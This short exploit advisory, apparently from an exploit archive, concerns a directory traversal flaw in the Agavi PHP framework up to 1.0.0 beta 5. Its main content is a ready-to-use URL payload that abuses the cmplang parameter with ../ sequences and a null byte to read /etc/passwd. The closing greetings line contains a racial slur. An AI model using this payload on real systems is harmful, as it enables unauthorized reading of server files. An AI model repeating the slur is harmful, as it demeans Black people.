agavi-traverse.txt

`AGAVI <=Agavi 1.0.0 beta 5 Directory Transversal Exploit  
vendor : http://www.agavi.org/  
affected versions : <=Agavi 1.0.0 beta 5 (latest)  
found by t0fx // http://forum.europasecurity.org white hat crew //  
  
exploit :  
  
http://www.site.com/index.php?module=page&action=Display&pageref=[pageref of the site]&cmplang=../../../../../../../../etc/passwd%00.jpg  
  
  
Greetz to zataz.com // security-sh3ll.com // str0ke // Pig nigger ^^  
  
`